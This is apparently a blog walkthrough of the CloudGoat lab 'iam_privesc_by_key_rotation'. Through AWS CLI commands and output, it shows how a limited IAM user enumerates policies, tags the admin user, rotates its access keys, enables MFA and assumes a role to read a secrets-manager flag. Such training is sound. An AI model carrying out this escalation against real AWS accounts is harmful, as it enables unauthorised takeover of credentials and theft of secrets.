CloudGoat: iam_privesc_by_key_rotation

5 min readMay 7, 2024



  • We will be performing our attack via Kali Linux
  • Ensure you have done the pre-requisites before you start the lab

1. Preparation

1.1 Launch the scenario:

└─# cd /opt/cloudgoat
└─# ./ create iam_privesc_by_key_rotation

# created 3 users into our AWS IAM -> manager, developer, admin
# check them from AWS management console

1.2 read the start.txt

└─# cd iam_privesc_by_key_rotation*

└─# cat start.txt

access key id = xxxaaa
access secret key = xxxbbb

2. Enumeration

2.1 create profile for manager user

└─# aws configure --profile manager

AWS Secret Access Key: 111122223333
Default region name:
Default output format:

2.2: whoami

└─# aws sts get-caller-identity --profile manager --region us-east-1

"UserId": "...",
"Account": "...",
"Arn": arn:aws:iam:1234:user/manager_iam_privesc_by_key_rotation_cgidsrm439imi5

2.3: policies enumeration for “manager” user

└─# aws iam list-user-policies --user-name manager_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

"PolicyNames": [
└─# aws iam get-user-policy --user-name manager_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --policy-name SelfManageAccess

"UserName": "manager_iam_privesc_by_key_rotation_cgidsrm439imi5",
"PolicyName": "SelfManageAccess",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
"Action": [
"Condition": {
"StringEquals": {
"aws:ResourceTag/developer": "true"
"Effect": "Allow",
"Resource": [
"Sid": "SelfManageAccess"
"Action": [
"Effect": "Allow",
"Resource": "arn:aws:iam::xxx:mfa/*",
"Sid": "CreateMFA"
└─# aws iam get-user-policy --user-name manager_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --policy-name TagResources

"UserName": "manager_iam_privesc_by_key_rotation_cgidsrm439imi5",
"PolicyName": "TagResources",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
"Action": [
"Effect": "Allow",
"Resource": "*",
"Sid": "TagResources"

2.4: policies enumeration for “developer” user

  • get the developer’s user name from AWS management console’s IAM
└─# aws iam list-user-policies --user-name developer_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

"PolicyNames": [
└─# aws iam get-user-policy --user-name developer_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --policy-name DeveloperViewSecrets

"UserName": "developer_iam_privesc_by_key_rotation_cgidsrm439imi5",
"PolicyName": "DeveloperViewSecrets",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
"Action": "secretsmanager:ListSecrets",
"Effect": "Allow",
"Resource": "*",
"Sid": "ViewSecrets"

2.5: policies enumeration for “admin” user

  • get the admin’s user name from AWS management console’s IAM
└─# aws iam list-user-policies --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

"PolicyNames": [
└─# aws iam get-user-policy --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --policy-name AssumeRoles

"UserName": "admin_iam_privesc_by_key_rotation_cgidsrm439imi5",
"PolicyName": "AssumeRoles",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Resource": "arn:aws:iam::xxx:role/cg_secretsmanager_iam_privesc_by_key_rotation_cgidsrm439imi5",
"Sid": "AssumeRole"
  • role name = cg_secretsmanager_iam_privesc_by_key_rotation_cgidsrm439imi5

2.6: policies enumeration for the role

└─# aws iam list-attached-role-policies --role-name cg_secretsmanager_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager
"AttachedPolicies": [
"PolicyName": "cg_view_secrets_iam_privesc_by_key_rotation_cgidsrm439imi5",
"PolicyArn": "arn:aws:iam::xxx:policy/cg_view_secrets_iam_privesc_by_key_rotation_cgidsrm439imi5"
└─# aws iam get-policy --policy-arn arn:aws:iam::xxx:policy/cg_view_secrets_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager
"Policy": {
... ... ...
"DefaultVersionId": "v1",
... ... ...
└─# aws iam get-policy-version --policy-arn arn:aws:iam::xxx:policy/cg_view_secrets_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --version-id v1
"PolicyVersion": {
"Document": {
"Statement": [
"Action": "secretsmanager:ListSecrets",
"Effect": "Allow",
"Resource": "*"
"Action": "secretsmanager:GetSecretValue",
"Effect": "Allow",
"Resource": "arn:aws:secretsmanager:us-east-1:xxx:secret:cg_secret_iam_privesc_by_key_rotation_cgidsrm439imi5-lRWCDA"
"Version": "2012-10-17"
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2024-05-07T02:51:13+00:00"

3. Exploitation

3.01: add a tag to the admin user to allow us to change its access key

└─# aws iam tag-user --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --tags '{"Key":"developer","Value":"true"}' --profile manager

3.02: List Access Keys

└─# aws iam list-access-keys --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager
"AccessKeyMetadata": [
"UserName": "admin_iam_privesc_by_key_rotation_cgidsrm439imi5",
"AccessKeyId": "xxxbbxxbb",
"Status": "Inactive",
"CreateDate": "2024-05-07T02:51:13+00:00"
"UserName": "admin_iam_privesc_by_key_rotation_cgidsrm439imi5",
"AccessKeyId": "xxxaaxxaa",
"Status": "Inactive",
"CreateDate": "2024-05-07T02:51:13+00:00"

3.03: Delete Access key

└─# aws iam delete-access-key --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --access-key xxxbbxxbb


3.04: Create Access Key

└─# aws iam create-access-key --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

"AccessKey": {
"UserName": "admin_iam_privesc_by_key_rotation_cgidsrm439imi5",
"AccessKeyId": "newAccessKeyID123",
"Status": "Active",
"SecretAccessKey": "newSecretAccessKey123",
"CreateDate": "2024-05-07T06:00:19+00:00"


3.05: Create profile for the above credentials

└─# aws configure --profile admin

AWS Access Key ID: newAccessKeyID123
AWS Secret Access Key: newSecretAccessKey123
Default region name:
Default output format:

3.06: create a virtual mfa device -> QR Code

└─# ls


└─# aws iam create-virtual-mfa-device --virtual-mfa-device-name cloudgoat_virtual_mfa --outfile /opt/cloudgoat/QRCode.png --bootstrap-method QRCodePNG --profile manager
"VirtualMFADevice": {
"SerialNumber": "arn:aws:iam::xxx:mfa/cloudgoat_virtual_mfa"

└─# ls

file.txt QRCode.png

3.07: set up the OTP with the QR Code and authenticator app

  • open the QRCode.png image
  • scan the QR code with your authenticator app (which can be Google authenticator, or Microsoft authenticator)
  • you will see OTP inside the authenticator app, it gets refreshed overtime

3.08: enable the virtual mfa device

└─# aws iam enable-mfa-device \
--user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 \
--serial-number arn:aws:iam::xxx:mfa/cloudgoat_virtual_mfa \
--authentication-code1 696202 \
--authentication-code2 204444 --profile manager
  • AWS MFA is asking for two OTP as seen in above “authentication-code1 and authentication-code2”
  • However, your authenticator app only has one OTP
  • we can use the current OTP as the 1st authentication-code value, and wait for it to expire and renew another OTP for the 2nd authentication-code value

3.09: assume a role

└─# aws sts assume-role --role-arn arn:aws:iam::xxx:role/cg_secretsmanager_iam_privesc_by_key_rotation_cgidsrm439imi5 --role-session-name cloudgoat_secret --serial-number arn:aws:iam::xxx:mfa/cloudgoat_virtual_mfa --token-code 490977 --profile admin

... ... ...
"AccessKeyId": "newAccessKeyID888",
"SecretKey": "newSecretAccessKey888",
"SessionToken": "xxxxxxxxaaaa",
... ... ...
  • the token-code will be another renewed OTP from your authenticator

3.10: create the profile from the above credentials

└─# aws configure --profile admin2

AWS Access Key ID: newAccessKeyID888
AWS Secret Access Key: newSecretAccessKey888
Default region name:
Default output format:
└─# mousepad /root/.aws/credentials
└─# cat /root/.aws/credentials

... ... ...
aws_access_key_id = newAccessKeyID888
aws_secret_access_key = newSecretAccessKey888
aws_session_token = xxxxxxxxaaaa

3.11: List the secrets in secretsmanager

└─# aws secretsmanager list-secrets --profile admin2 --region us-east-1

"SecretList": [
"ARN": "arn:aws:secretsmanager:us-east-1:xxx:secret:cg_secret_iam_privesc_by_key_rotation_cgidsrm439imi5-lRWCDA",
"Name": "cg_secret_iam_privesc_by_key_rotation_cgidsrm439imi5",
"Description": "The primary secret for the iam_privesc_by_key_rotation scenario",
"LastChangedDate": "2024-05-06T22:51:13.779000-04:00",
"LastAccessedDate": "2024-05-06T20:00:00-04:00",
"Tags": [
"Key": "Scenario",
"Value": "iam_privesc_by_key_rotation"
"Key": "Stack",
"Value": "CloudGoat"
"SecretVersionsToStages": {
"terraform-20240507025113290800000003": [
"CreatedDate": "2024-05-06T22:51:11.359000-04:00"
└─# aws secretsmanager get-secret-value --secret-id cg_secret_iam_privesc_by_key_rotation_cgidsrm439imi5 --region us-east-1 --profile admin2 | grep flag
"SecretString": "flag{14m_PERM15510N5_4Re_5C4R_76e05xxx}",


4. Clean up

└─# ./ destroy iam_privesc_by_key_rotation --help

Destroy xxx [y/n]: y

└─# rm QRCode.png




Written by 0xLeeBai

床前明月光,疑是地上霜。 举头望明月,低头思故乡。

No responses yet